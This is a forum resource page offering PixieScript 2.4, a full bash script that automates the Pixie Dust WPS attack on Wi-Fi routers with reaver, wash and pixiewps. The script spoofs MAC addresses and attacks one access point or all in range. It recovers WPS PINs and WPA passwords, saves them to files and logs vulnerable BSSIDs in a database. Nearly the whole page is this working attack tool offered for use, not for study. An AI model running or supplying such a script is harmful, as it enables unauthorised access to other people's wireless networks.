PixieScript (English) 2.4

Automation of the new Pixie WPS vulnerabilities

Watchers:
This resource is being watched by 243 members.
  1. bulaien
    FEATURES
    - Based on PixieWps new version (1.0) of wiire.
    - Attack in principle only works with APs with Broadcom or Ralink chipset
    - Allows automatically attack all access points within range.
    - Allows attacks to a single AP
    - Detection of processes that may interfere with monitor mode the card, closes and restarts automatically launch if you wish.
    - Contains database of known vulnerable BSSIDs



    Code:
    Select All
    #!/bin/bash # VERSION DEL SCRIPT VERSION="v2.4" # Secuencias de colores ESC_SEQ="\x1b[" COL_RESET=$ESC_SEQ"39;49;00m" ROJO=$ESC_SEQ"31;01m" VERDE=$ESC_SEQ"32;01m" AMARILLO=$ESC_SEQ"33;01m" AZUL=$ESC_SEQ"34;01m" CYAN=$ESC_SEQ"36;01m" # Para saber si hemos elegido ya una interface para ponerla en modo monitor, así si cambiamos o repetimos el tipo de ataque no se nos volverá a pedir que tarjeta queremos tener en modo monitor HEMOS_ELEGIDO_INTERFACE="NO" # Para saber si hemos matado procesos y lanzarlos al salir HEMOS_MATADO_PROCESOS="NO" # Directorio de los logs CARPETA_LOGS=`pwd`"/LOGS/" # Directorio para los scripts CARPETA_SCRIPTS=`pwd`"/SCRIPTS/" # CARPETA PARA LAS KEYS RECUPERADAS CARPETA_KEYS=`pwd`"/PIXIESCRIPT_KEYS/" # Log wash WASH_LOG=$CARPETA_LOGS"WASH.LOG" WASH_SORT_LOG=$CARPETA_LOGS"WASH_SORT.LOG" # Log varios ARCHIVO_LOG=$CARPETA_LOGS"VARIOS.LOG" # Guarda temporalmente las macs probadas en los que reaver fallo SIN_DATOS=`pwd`"/LOGS/SINDATOS.LOG" # Guarda temporalmente las macs probadas en los que pixiewps fallo PROBADAS=`pwd`"/LOGS/PROBADAS.LOG" # MENU PRINCIPAL DEL PROGRAMA menu() { clear echo -e $CYAN"Pixie Dust Script $VERSION por 5.1"$COL_RESET echo "" echo -e $VERDE" 1. List vulnerable known MACs" echo "" echo -e " 2. Attacking a particular AP" echo "" echo -e " 3. Available attack AP" echo "" echo -e " 4. Exit"$COL_RESET echo "" echo -en $CYAN"Select an option and press ENTER: "$COL_RESET read accion case $accion in 1) listar_macs_vulnerables ;; 2) ataque_individual ;; 3) ataque_completo ;; 4) limpiar ;; *) menu ;; esac } # CONSULTA EN EL ARCHIVO DATABASE Y MUESTRA LOS BSSID AFECTADOS CONOCIDOS listar_macs_vulnerables() { clear $CARPETA_SCRIPTS./database v echo "" echo -en $CYAN"Press ENTER to return to menu ... "$COL_RESET read menu } # SI ATACAMOS A UN SOLO AP ataque_individual() { if [ $HEMOS_ELEGIDO_INTERFACE = "NO" ] then desactivar_todos_monX seleccionar_tarjeta activar_modo_monitor if [ $MONITOR_ACTIVADO != "SI" ] then echo -e $ROJO"Error putting in monitor mode interface of choice" $COL_RESET menu fi HEMOS_ELEGIDO_INTERFACE="SI" cambiar_mac fi tiempo_reaver datos_ap_atacar if [ $todo_ok -eq 1 ] then menu fi MODO_AUTOMATICO="NO" atacar_ap echo echo -e $AMARILLO"ATTACK FINISHED, PRESS ENTER TO RETURN TO MENU"$COL_RESET read menu } ataque_completo() { if [ $HEMOS_ELEGIDO_INTERFACE = "NO" ] then desactivar_todos_monX seleccionar_tarjeta activar_modo_monitor if [ $MONITOR_ACTIVADO != "SI" ] then echo -e $ROJO"Error putting in monitor mode interface of choice" $COL_RESET menu fi HEMOS_ELEGIDO_INTERFACE="SI" cambiar_mac fi tiempo_wash tiempo_reaver lanzar_wash analizar_wash_log } ################################################################## ## PART OF SCRIPT TO DRIVE INTERFACES based on GoyScript ## ################################################################## desactivar_todos_monX() { INTERFACES_MONITOR=`iwconfig --version | grep "Recommend" | awk '{print $1}' | grep mon` let CUANTAS=`echo $INTERFACES_MONITOR | wc -w` let CONT=1 while [ $CONT -le $CUANTAS ] do MON=`echo $INTERFACES_MONITOR | awk '{print $'$CONT'}'` airmon-ng stop $MON > /dev/null 2>&1 let CONT=$CONT+1 done } seleccionar_tarjeta() { clear TARJETAS_WIFI_DISPONIBLES=`iwconfig --version | grep "Recommend" | awk '{print $1}' | sort` N_TARJETAS_WIFI=`echo $TARJETAS_WIFI_DISPONIBLES | awk '{print NF}'` if [ "$TARJETAS_WIFI_DISPONIBLES" = "" ] then echo -e $ROJO"ERROR: No WiFi card was detected"$COL_RESET echo "" echo -en $CYAN"Press ENTER to exit... "$COL_RESET read limpiar else echo -e $CYAN"WiFi cards available:"$COL_RESET echo -e $AMARILLO let x=1 while [ $x -le $N_TARJETAS_WIFI ] do INTERFAZ=`echo $TARJETAS_WIFI_DISPONIBLES | awk '{print $'$x'}'` DRIVER=`ls -l /sys/class/net/$INTERFAZ/device/driver | sed 's/^.*\/\([a-zA-Z0-9_-]*\)$/\1/'` TOTAL=`echo $TOTAL $x" "$INTERFAZ" "$DRIVER"\n"` x=$((x+1)) done (echo -e "Nº INTERFACE DRIVER"$COL_RESET ; echo -e $TOTAL ) | column -t if [ $N_TARJETAS_WIFI -gt 1 ] then echo -e "\n\n""$CYAN""Select a WiFi card:\c"$COL_RESET echo -e "\c" read OPCION while [[ $OPCION < 1 ]] || [[ $OPCION > $N_TARJETAS_WIFI ]] do echo -en $ROJO"\aOPCIÓN NO VÁLIDA"$COL_RESET sleep 1 echo -en $CYAN"\rSelecciona una tarjeta WiFi: \c"$COL_RESET read OPCION done else OPCION=1 fi fi if [ $N_TARJETAS_WIFI -gt 1 ] then INTERFAZ=`echo $TARJETAS_WIFI_DISPONIBLES | awk '{print $'$OPCION'}'` echo -e "\n" echo -e $AMARILLO"You have selected: "$INTERFAZ $COL_RESET echo else echo echo -e $AMARILLO"Only detected a WiFi card: "$INTERFAZ $COL_RESET echo fi } activar_modo_monitor() { reiniciar_interface matar_procesos echo "" echo -e $AMARILLO"Starting monitor mode "$INTERFAZ$COL_RESET airmon-ng start $INTERFAZ &> $ARCHIVO_LOG lineas_log=`cat $ARCHIVO_LOG | wc -l` for A in `seq 1 $lineas_log` ; do linea=`head -$A $ARCHIVO_LOG | tail -1` if [[ $linea == *enabled* ]] then INTERFACE_MONITOR=`echo $linea | awk {' print $5 '} | sed 's/)//g'` MONITOR_ACTIVADO="SI" echo -e $AMARILLO"Monitor mode enabled on " $INTERFACE_MONITOR $COL_RESET break else MONITOR_ACTIVADO="NO" fi done } matar_procesos() { PROCESOS=`ps -A | grep -e dhcpcd -e NetworkManager -e wpa_supplicant | grep -v grep` if [ "$PROCESOS" != "" ] then echo -e $AMARILLO"Found processes that could interfere with the operation of the network card in monitor mode"$COL_RESET echo "" echo -e $PROCESOS | awk '{ print $4 $8 $12 }' echo "" echo -en $CYAN"¿ Want to stop (y/n) ?"$COL_RESET read decison_matar_procesos while [[ $decison_matar_procesos != "y" && $decison_matar_procesos != "S" && $decison_matar_procesos != "n" && $decison_matar_procesos != "N" ]] do echo "" echo -e $ROJO"INVALID OPTION"$COL_RESET echo -en $AMARILLO"Want to stop (s/n) ?" $COL_RESET read decison_matar_procesos done if [[ $decison_matar_procesos = "s" || $decison_matar_procesos = "S" ]] then echo "" echo -e $AMARILLO"\nDeteniendo NetworkManager"$COL_RESET /etc/rc.d/rc.networkmanager stop echo -en $AMARILLO"Deteniendo dhcpcd ...."$COL_RESET pid_proceso=`ps -A | grep dhcpcd | awk '{ print $1 }'` if [ -n $pid_proceso ] then kill pid_proceso &> /dev/null fi echo -e $AMARILLO"Ok"$COL_RESET echo -en $AMARILLO"wpa_supplicant detected.... "$COL_RESET pid_proceso=`ps -A | grep wpa_supplicant | awk '{ print $1 }'` if [ -n $pid_proceso ] then kill -9 $pid_proceso &> /dev/null fi echo -e $AMARILLO"Ok"$COL_RESET HEMOS_MATADO_PROCESOS="SI" else HEMOS_MATADO_PROCESOS="NO" fi fi desactivar_todos_monX } reiniciar_interface() { DRIVER=`ls -l /sys/class/net/$INTERFAZ/device/driver | awk -F '/' '{print $NF}'` echo -e $AMARILLO"Restarting the Interface $INTERFAZ $DRIVER..."$COL_RESET echo "" rmmod -f "$DRIVER" >/dev/null 2>&1 #reiniciamos la interfaz if [ "$DRIVER" = "ath9k_htc" ] then ifconfig $INTERFAZ >/dev/null 2>&1 while [ $? -eq 0 ] #esperamos a que se desactive el módulo de la interfaz do ifconfig $INTERFAZ >/dev/null 2>&1 done fi modprobe "$DRIVER" >/dev/null 2>&1 if [ "$DRIVER" = "ath9k_htc" ] then ifconfig $INTERFAZ >/dev/null 2>&1 while [ $? -ne 0 ] #esperamos a que se active el módulo de la interfaz do ifconfig $INTERFAZ >/dev/null 2>&1 done fi } ################################################################## ##### CAMBIO Y VALIDACION DE MAC ADRESS #### ################################################################## cambiar_mac() { echo echo -en $CYAN"You want to change the MAC $INTERFACE_MONITOR ? (s/n)"$COL_RESET read cambiar while [[ $cambiar != "s" && $cambiar != "S" && $cambiar != "n" && $cambiar != "N" ]] do echo echo -e $ROJO"Opción incorrecta"$COL_RESET echo -en $CYAN"Quieres cambiar la MAC de "$INTERFACE_MONITOR "? (s/n)"$COL_RESET read cambiar done if [ $cambiar = "s" ] || [ $cambiar = "S" ] then echo echo -e $VERDE"1. Randomly"$COL_RESET echo -e $VERDE"2. Manually"$COL_RESET echo "" echo -en $CYAN"How you want to change(1/2)?"$COL_RESET read como_cambiar while [[ -z $como_cambiar || $como_cambiar != "1" && $como_cambiar != "2" ]] do echo echo -en $ROJO"Incorrect option"$COL_RESET$CYAN", select 1 for random change or 2 to manually "$COL_RESET read como_cambiar done case $como_cambiar in 1) cambio_mac_random ;; 2) echo echo -e $CYAN"Enter the desired MAC and press ENTER : "$COL_RESET read MAC_A_VALIDAR validar_mac while [ $mac_correcta -eq 1 ] do echo -e $ROJO"Error in the format of the MAC"$COL_RESET echo -e $CYAN"Enter the desired MAC and press ENTER : "$COL_RESET read MAC_A_VALIDAR validar_mac done cambio_mac_manual ;; esac echo ifconfig $INTERFACE_MONITOR echo echo -e $CYAN"Press ENTER to continue"$COL_RESET read else echo fi } cambio_mac_random() { ifconfig $INTERFACE_MONITOR down macchanger -a $INTERFACE_MONITOR ifconfig $INTERFACE_MONITOR up } cambio_mac_manual () { ifconfig $INTERFACE_MONITOR down macchanger -m $MAC $INTERFACE_MONITOR ifconfig $INTERFACE_MONITOR up } validar_mac() { let mac_correcta=1 if [ -z $MAC_A_VALIDAR ] || [ "${#MAC_A_VALIDAR}" != 17 ] then let mac_correcta=1 return fi for ((i=1; i<=17; i++)); do caracter=`expr substr $MAC_A_VALIDAR $i 1` case $i in 3|6|9|12|15) if [ $caracter != ":" ]; then let mac_correcta=1 return fi ;; 2) if [[ $caracter =~ [ACEace02468] ]]; then let mac_correcta=0 else let mac_correcta=1 return fi ;; 1|4|5|7|8|10|11|13|14|16|17) if [[ $caracter =~ [A-Fa-f0-9] ]]; then let mac_correcta=0 else let mac_correcta=1 return fi ;; esac done } ################################################################## ##### RECOGE LOS DATOS PROPORCIONADOS POR EL USUARIO #### ################################################################## tiempo_reaver() { echo "" echo -en $CYAN"Enter the maximum time in seconds that reaver is trying to prove a pin : "$COL_RESET read TIEMPO_REAVER es_numero=`[[ $TIEMPO_REAVER =~ ^[0-9]*$ ]] ; echo $?` if [ -z $TIEMPO_REAVER ] || [ $es_numero = 1 ] then echo -e $ROJO"Error, the value entered is not correct, the default value applies (40)"$COL_RESET TIEMPO_REAVER=40 echo -e $CYAN"Press ENTER to continue"$COL_RESET read fi } tiempo_wash() { echo "" echo -en $CYAN"Enter the time in seconds that wash is trying to find targets : "$COL_RESET read TIEMPO_WASH es_numero=`[[ $TIEMPO_WASH =~ ^[0-9]*$ ]] ; echo $?` if [ -z $TIEMPO_WASH ] || [ $es_numero -eq 1 ] then echo -e $ROJO"Error, the value entered is not correct, the value is applied by default (40)"$COL_RESET TIEMPO_WASH=40 echo -e $CYAN"Press ENTER to continue"$COL_RESET read fi } datos_ap_atacar() { let todo_ok=1 echo "" echo "" echo -en $CYAN"Enter the BSSID to attack: "$COL_RESET read mac_a_atacar MAC_A_VALIDAR=$mac_a_atacar validar_mac if [ $mac_correcta -eq 1 ] then echo -e $ROJO"Error in the format of the MAC entered, press ENTER to return to menu"$COL_RESET read return $todo_ok fi echo -en $CYAN"Enter SSID to attack: "$COL_RESET read nombre echo -en $CYAN"Enter channel : "$COL_RESET read canal es_numero=`[[ $canal =~ ^[0-9]*$ ]] ; echo $?` while [ -z $canal ] || [ $es_numero = 1 ] do echo -e $ROJO"Error, the channel entered is not correct"$COL_RESET echo -en $CYAN"Enter channel : "$COL_RESET read canal es_numero=`[[ $canal =~ ^[0-9]*$ ]] ; echo $?` done let todo_ok=0 } ################################################################## ##### PROCESO DE ATAQUE ###### ################################################################## esperar_acabar_reaver() { for A in `seq 1 $TIEMPO_REAVER` ; do sleep 1s pid_reaver=`ps -A | grep reaver | awk '{ print $1 }'` if [ -n "$pid_reaver" ] then if [ $A -eq $TIEMPO_REAVER ] then if [ $vez -eq 1 ] then echo -e $ROJO"HAVE NOT BEEN ABLE TO OBTAIN THE NECESSARY DATA $nombre, Reaver attack failed"$COL_RESET else echo -e $ROJO"HAVE NOT BEEN ABLE TO RECOVER THE KEY WPA $nombre"$COL_RESET fi echo "" matar_reaver let todo_ok=1 return $todo_ok else TIEMPO_RESTANTE=`expr $TIEMPO_REAVER - $A` if [ $vez -eq 1 ]; then clear; fi if [ $vez -eq 1 ]; then echo -e $AMARILLO"REAVER WORKING WITH BSSID $mac_a_atacar, ESSID $nombre DURATION $TIEMPO_RESTANTE s ..."$COL_RESET; fi if [ $vez -eq 1 ]; then if [ $DEBUG = "SI" ]; then cat $ARCHIVO_LOG; fi ; fi if [[ $vez -eq 2 && $DEBUG = "SI" ]] then let B=`expr $A-1` ultima_linea=`head -$B $ARCHIVO_LOG | tail -1` nueva_linea=`head -$A $ARCHIVO_LOG | tail -1` if [[ -n "$nueva_linea" && "$nueva_linea" != "$ultima_linea" ]] then echo $nueva_linea fi fi fi else let todo_ok=0 return $todo_ok fi done } matar_reaver() { pid_reaver=`ps -A | grep reaver_pixie | awk '{ print $1 }'` kill $pid_reaver &> /dev/null } extraer_datos_reaver() { let todo_ok=1 echo -e $AMARILLO"REMOVING DATA ..."$COL_RESET TOTAL=`cat $ARCHIVO_LOG | wc -l` for A in `seq 1 $TOTAL` ; do linea=`head -$A $ARCHIVO_LOG | tail -1` if [[ $linea == *PKe* ]] then PKe=`echo $linea | awk 'BEGIN{FS=":"}{print $NF}'` PKe=`echo $PKe | sed 's/ /:/g'` fi if [[ $linea == *PKr* ]] then PKr=`echo $linea | awk 'BEGIN{FS=":"}{print $NF}'` PKr=`echo $PKr | sed 's/ /:/g'` fi if [[ $linea == *E-Hash1* ]] then EHash1=`echo $linea | awk 'BEGIN{FS=":"}{print $NF}'` EHash1=`echo $EHash1 | sed 's/ /:/g'` fi if [[ $linea == *E-Hash2* ]] then EHash2=`echo $linea | awk 'BEGIN{FS=":"}{print $NF}'` EHash2=`echo $EHash2 | sed 's/ /:/g'` fi if [[ $linea == *AuthKey* ]] then AuthKey=`echo $linea | awk 'BEGIN{FS=":"}{print $NF}'` AuthKey=`echo $AuthKey | sed 's/ /:/g'` fi if [[ $linea == *E-Nonce* ]] then Enrollee=`echo $linea | awk 'BEGIN{FS=":"}{print $NF}'` Enrollee=`echo $Enrollee | sed 's/ /:/g'` fi done if [ -z $PKr ] then echo -e $ROJO"HAVE NOT BEEN ABLE TO GET THE KEY PKR"$COL_RESET let todo_ok=1 return $todo_ok fi if [ -z $PKe ] then echo -e $ROJO"HAVE NOT BEEN ABLE TO GET THE KEY PKE"$COL_RESET let todo_ok=1 return $todo_ok fi if [ -z $EHash1 ] then echo -e $ROJO"HAVE NOT BEEN ABLE TO GET THE KEY EHASH1"$COL_RESET let todo_ok=1 return $todo_ok fi if [ -z $EHash2 ] then echo -e $ROJO"HAVE NOT BEEN ABLE TO GET THE KEY EHASH2"$COL_RESET let todo_ok=1 return $todo_ok fi if [ -z $AuthKey ] then echo -e $ROJO"HAVE NOT BEEN ABLE TO GET THE KEY AUTHKEY"$COL_RESET let todo_ok=1 return $todo_ok fi if [ -z $Enrollee ] then echo -e $ROJO"HAVE NOT BEEN ABLE TO GET THE KEY Enrollee Nonce"$COL_RESET let todo_ok=1 return $todo_ok fi echo -e "PKr :"$VERDE $PKr $COL_RESET echo -e "PKe :"$VERDE $PKe $COL_RESET echo -e "EHASH1 :"$VERDE $EHash1 $COL_RESET echo -e "EHASH2 :"$VERDE $EHash2 $COL_RESET echo -e "AuthKey:"$VERDE $AuthKey $COL_RESET echo -e "E-Nonce:"$VERDE $Enrollee $COL_RESET let todo_ok=0 return $todo_ok } lanzar_pixiewps() { echo "" echo -e $AMARILLO"TESTING WITH PIXIEWPS 1.0 by wiire"$COL_RESET pixiewps -e $PKe -r $PKr -s $EHash1 -z $EHash2 -a $AuthKey -n $Enrollee &> $ARCHIVO_LOG cat $ARCHIVO_LOG analizar_log_pixiewps } analizar_log_pixiewps() { lineas_log=`cat $ARCHIVO_LOG | wc -l` let A=0 for A in `seq 1 $lineas_log` ; do linea=`head -$A $ARCHIVO_LOG | tail -1` if [[ $linea == *"WPS pin"* ]] then if [[ $linea == *"not found"* ]] then if [ ! -f $PROBADAS ];then touch $PROBADAS;fi if [ ! `grep -r $mac_a_atacar $PROBADAS` ] then echo $mac_a_atacar >> $PROBADAS fi return fi PIN_WPS=`echo $linea | awk -F":" {' print $2 '} ` echo -e $AMARILLO"Retrieving WPA wait ..."$COL_RESET reaver_pixie -i $INTERFACE_MONITOR -b $mac_a_atacar -a -D -c $canal -p $PIN_WPS &> $ARCHIVO_LOG let vez=2 esperar_acabar_reaver if [ $todo_ok = 0 ] then cat $ARCHIVO_LOG recuperar_clave_wpa else CLAVE_WPA="COULD NOT RECOVER THE KEY WPA" fi echo "ESSID : "$nombre > $CARPETA_KEYS$nombre".datos" echo "BSSID : "$mac_a_atacar >> $CARPETA_KEYS$nombre".datos" echo "PIN WPS : "$PIN_WPS >> $CARPETA_KEYS$nombre".datos" echo "KEY WPA : "$CLAVE_WPA >> $CARPETA_KEYS$nombre".datos" echo "" echo -e $AMARILLO"PIN AND DUMPS WPA KEY TO FILE " $nombre".datos"$COL_RESET agregar_mac_vulnerable fi done } recuperar_clave_wpa() { lineas_log=`cat $ARCHIVO_LOG | wc -l` let A=0 for A in `seq 1 $lineas_log` ; do linea=`head -$A $ARCHIVO_LOG | tail -1` if [[ $linea == *"WPA PSK"* ]] then CLAVE_WPA=`echo $linea | awk -F":" {' print $2 '}` CLAVE_WPA=`echo $CLAVE_WPA | awk -F"'" {' print $2 '}` fi done } datos_router() { datos=$CARPETA_LOGS"datos" rm $datos* &> /dev/null echo "" echo -e $AMARILLO"Capturing data from the AP, wait 5 seconds"$COL_RESET (airodump-ng --bssid $mac_a_atacar --channel $canal --manufacturer -w $datos mon0 &> /dev/null &) sleep 5 killall airodump-ng delimitador="<{manuf>" fabricante=`cat $datos-01.kismet.netxml | grep "<manuf>" | sed 's/\///g' | sed 's/<manuf>//g'` rm datos* &> /dev/null } agregar_mac_vulnerable() { ESTA_EN_DATABASE=`$CARPETA_SCRIPTS./database b $mac_a_atacar` if [ $ESTA_EN_DATABASE = "NO" ] then $CARPETA_SCRIPTS./database a $mac_a_atacar $fabricante $nombre echo -e $AMARILLO"AP ADDED TO THE DATABASE"$COL_RESET else echo -e $AMARILLO"AP WAS IN THE DATABASE, will not be added"$COL_RESET fi } lanzar_wash() { rm $WASH_LOG &> /dev/null clear wash -C -D -i $INTERFACE_MONITOR &> $WASH_LOG echo -e $AMARILLO"BUSCANDO OBJETIVOS CON WASH, ESPERA "$TIEMPO_WASH" s ..."$COL_RESET let A=0 for A in `seq 1 $TIEMPO_WASH` ; do sleep 1s if [ $A -eq $TIEMPO_WASH ] then PID_WASH=`ps -A | grep wash | awk '{ print $1}'` kill $PID_WASH else clear TIEMPO_RESTANTE=`expr $TIEMPO_WASH - $A` echo -e $AMARILLO"LOOKING OBJECTS WASH, WAIT "$TIEMPO_RESTANTE" s ..."$COL_RESET echo "" fi done } cat_wash_log() { clear echo -e $ROJO"PROBADAS Y NO VULNERABLES"$COL_RESET$AMARILLO" PROBADAS PERO SIN CONSEGUIR DATOS PARA EL ATAQUE"$COL_RESET$VERDE" VULNERABLES"$COL_RESET" NO PROBADAS" echo"" # ELIMINO CABECERAS Y ORDENO POR INTENSIDAD DE SEÑAL sed '1,6d' $WASH_LOG | sort -t"-" -k2n > $WASH_SORT_LOG echo -e $CYAN"Nº BSSID Channel RSS WPS Version Locked ESSID"$COL_RESET echo -e $CYAN"---------------------------------------------------------------------------"$COL_RESET let contador=1 cat $WASH_SORT_LOG |\ while read LINE; do espacios="" if [ $contador -gt 0 ] && [ $contador -lt 10 ]; then espacios=" "; fi if [ $contador -gt 9 ] && [ $contador -lt 100 ]; then espacios=" "; fi if [ $contador -gt 99 ] && [ $contador -lt 1000 ]; then espacios=" "; fi MAC_WASH="${LINE:0:17}" ESTA_EN_DATABASE=`$CARPETA_SCRIPTS./database b $MAC_WASH` if [ ! -f $PROBADAS ];then touch $PROBADAS;fi if [ ! -f $SIN_DATOS ];then touch $SIN_DATOS;fi if [ $ESTA_EN_DATABASE = "SI" ] then echo -e "$VERDE$contador$espacios$LINE$COL_RESET" else if [ `grep -r $MAC_WASH $PROBADAS` ] then echo -e "$ROJO$contador$espacios$LINE$COL_RESET" else if [ `grep -r $MAC_WASH $SIN_DATOS` ] then echo -e "$AMARILLO$contador$espacios$LINE$COL_RESET" else echo "$contador$espacios$LINE" fi fi fi let contador=$contador+1 done } analizar_wash_log() { clear cat_wash_log echo "" echo -en $CYAN"Choose number of BSSID, press T to attack them all automatically, M to return to the main menu" $COL_RESET read decision #if [ -z $decision ];then analizar_wash_log;fi if [ -z $decision ] then analizar_wash_log fi maximo=`wc -l $WASH_SORT_LOG | awk {' print $1 '}` while [[ $decision != "m" && $decision != "M" && $decision != "t" && $decision != "T" && $decision -lt 1 && $decision -gt $maximo ]] do echo "" echo -e $ROJO"OPCIÓN NO VÁLIDA"$COL_RESET sleep 1 echo -en $CYAN"Choose number of BSSID, press T to attack them all automatically, M to return to the main menu" $COL_RESET read decision done if [[ $decision = "m" || $decision = "M" ]]; then menu elif [[ $decision = "t" || $decision = "T" ]]; then echo MODO_AUTOMATICO="SI" ataque_automatico elif [[ $decision -ge 1 && $decision -le $maximo ]]; then MODO_AUTOMATICO="NO" atacar_ap_aut echo -e $CYAN"Attack finished, press ENTER to continue"$COL_RESET read fi analizar_wash_log } ataque_automatico() { for MA in `seq 1 $maximo` ; do let decision=$MA atacar_ap_aut done } atacar_ap_aut() { mac_a_atacar=`head -$decision $WASH_SORT_LOG | tail -1 | awk '{ print $1 }'` canal=`head -$decision $WASH_SORT_LOG | tail -1 | awk '{ print $2 }'` locked=`head -$decision $WASH_SORT_LOG | tail -1 | awk '{ print $5 }'` nombre=`head -$decision $WASH_SORT_LOG | tail -1 | awk '{ print $6 }'` control_espacio_blanco=`head -$decision $WASH_SORT_LOG | tail -1 | awk '{ print $7 }'` let esp=8 while [ $control_espacio_blanco ] do nombre=`echo $nombre" "$control_espacio_blanco` control_espacio_blanco=`head -$decision $WASH_SORT_LOG | tail -1 | awk -v i=$esp '{ print $i }'` let esp=$esp+1 done if [ $locked = "SI" ] then if [ $MODO_AUTOMATICO = "NO" ] then echo -e $AMARILLO"AP locked, press ENTER to continue with another AP"$COL_RESET read fi continue fi atacar_ap } atacar_ap() { clear rm $CARPETA_LOGS*.cap &> /dev/null ifconfig $INTERFAZ up &> /dev/null echo -e $CYAN"LAUNCHING REAVER, WAIT "$TIEMPO_REAVER" s ..."$COL_RESET reaver_pixie --FINALIZAR -i $INTERFACE_MONITOR -b $mac_a_atacar -c $canal -a -n -vv -D > $ARCHIVO_LOG 2> /dev/null let vez=1 esperar_acabar_reaver if [ $todo_ok -eq 1 ] then if [ ! -f $SIN_DATOS ];then touch $SIN_DATOS;fi if [ ! `grep -r $mac_a_atacar $SIN_DATOS` ] then echo $mac_a_atacar >> $SIN_DATOS fi return $todo_ok fi extraer_datos_reaver if [ $todo_ok -eq 1 ] then if [ ! -f $SIN_DATOS ];then touch $SIN_DATOS;fi if [ ! `grep -r $mac_a_atacar $SIN_DATOS` ] then echo $mac_a_atacar >> $SIN_DATOS fi return $todo_ok fi echo "" datos_router echo "" echo -e $AMARILLO"MANUFACTURER : "$COL_RESET $VERDE $fabricante echo -e $AMARILLO"BSSID : "$COL_RESET $VERDE $mac_a_atacar echo -e $AMARILLO"ESSID : "$COL_RESET $VERDE $nombre echo "" lanzar_pixiewps echo "" if [ $MODO_AUTOMATICO = "N0" ] then echo -e $CYAN"Press ENTER to continue " $COL_RESET read fi } #################################################################### #################################################################### limpiar() { echo"" rm $CARPETA_LOGS* &> /dev/null killall reaver_pixie &> /dev/null killall airodump-ng &> /dev/null killall wash &> /dev/null killall pixie &> /dev/null desactivar_todos_monX if [ -z $HEMOS_MATADO_PROCESOS ] then HEMOS_MATADO_PROCESOS="NO" fi if [ $HEMOS_MATADO_PROCESOS = "SI" ] then clear echo -e $AMARILLO"Throwing ended put the card into monitor mode processes"$COL_RESET /etc/rc.d/rc.networkmanager start fi exit 0 } modo_debug() { clear echo echo echo -e $AMARILLO"PIXIE SCRIPT $VERSION FOR 5.1"$COL_RESET echo echo -en $ROJO"WANT TO ACTIVATE DEBUG MODE (S/N)"$COL_RESET read MODO case $MODO in s|S) DEBUG="SI" ;; n|N) DEBUG="NO" ;; *) modo_debug ;; esac } trap limpiar SIGHUP SIGINT #trap salir SIGSTOP # control z rm $CARPETA_LOGS* &> /dev/null modo_debug menu